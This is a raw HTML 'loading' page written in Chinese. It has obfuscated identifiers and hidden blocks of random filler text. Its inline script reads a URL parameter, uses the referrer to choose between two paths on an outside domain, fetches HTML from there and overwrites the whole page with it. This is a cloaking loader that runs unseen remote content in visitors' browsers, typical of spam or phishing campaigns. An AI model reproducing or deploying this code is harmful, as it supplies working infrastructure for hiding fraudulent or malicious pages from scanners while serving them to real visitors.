<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .z6vzfb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .z6vzfb .VA8Wdkz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .z6vzfb .content {
            line-height: 50px;
            text-align: center
        }

        .z6vzfb .img {
            width: 100%
        }

        .z6vzfb .CJQrfzDZ5 {
            text-align: center
        }

        .z6vzfb .CJQrfzDZ5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .z6vzfb .CJQrfzDZ5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .z6vzfb .CJQrfzDZ5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .z6vzfb .CJQrfzDZ5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .z6vzfb .CJQrfzDZ5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .z6vzfb .CJQrfzDZ5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .z6vzfb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UXtEcOLP0d(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SMHPr7Z = UXtEcOLP0d('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SMHPr7Z +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SMHPr7Z +".html?a=share";
		}
		
        F6jkJCGoA=url+"#"+new Date().getTime();
        F6jkJCGoA && function() {
            $.get(F6jkJCGoA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>DcbxsYbwrrID1deaQAhsY2cWzvjB1OxhaEg5kvaeRh82eERuEy7cOKX6EQ6wCR5p0MIjxLcwUoZlYgbxzI2rl7wm4yDHx</div>
<li style='display:none' >FG0ssoWBiZ37SkwzawxeS</li>
<div style='display:none'>DcbxsYbwrrID1deaQAhsY2cWzvjB1OxhaEg5kvaeRh82eERuEy7cOKX6EQ6wCR5p0MIjxLcwUoZlYgbxzI2rl7wm4yDHx</div>
<p  style='display:none'>QKUj9n1xZxbN2GbvjePoQ03WpYsAhycFWib3e2Q3PjC77xCYkOa3zDuMxIXV5ScnP</p>
<div style='display:none'>DcbxsYbwrrID1deaQAhsY2cWzvjB1OxhaEg5kvaeRh82eERuEy7cOKX6EQ6wCR5p0MIjxLcwUoZlYgbxzI2rl7wm4yDHx</div>
<b style='display:none' >cF4npIJJo1iR8uzqsuHscoqc4q39ItigH0KhABvrOUiMveKyPNJUa5AW5zwlxwI5g3M2mmTFAXuKfGNk</b>
<ul style='display:none' >tGd1vG1cvYnzOIjWf2G4v</ul>
<a  href='#' style='display:none'>QhX2SpNwK6ajmALBefuv0wcYc0M6udwSucLVSd5FCSmuArtMJ3eXPfk5yB6l4zu9ihUT2bqfFnY83RbHiCR5QBpUwYfpG</a>
<li style='display:none' >FG0ssoWBiZ37SkwzawxeS</li>
<h1 style='display:none' >QCKSM6QlirozzqurcBQHVoTuMJHTwnwafUWDJ9e1bSmd9FHoirMPdRMc3THvZggTCjITn0ZZKDni3IKsvTHwo3TxjDh2h</h1><div class="z6vzfb">
    <div class="VA8Wdkz">
        <div class="CJQrfzDZ5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >JGGlPXNLJa7jy6QA44fySmdLMqwHJos8OoIbDhXzDTsCZhogfUCrxXEOa6iUxj1XdQSqFF</h1>
<img  src='' style='display:none'>
<ul style='display:none' >tAv80TJP29VeBSpfYGGQXrv4NLViUT7QHS</ul>
<ul style='display:none' >tAv80TJP29VeBSpfYGGQXrv4NLViUT7QHS</ul>
<p  style='display:none'>itbp9MHjtaIBKIJGpZh</p>
<ul style='display:none' >tAv80TJP29VeBSpfYGGQXrv4NLViUT7QHS</ul></body>
</html>